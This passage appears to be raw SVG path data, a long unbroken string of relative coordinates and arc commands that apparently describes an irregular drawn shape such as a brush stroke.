8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6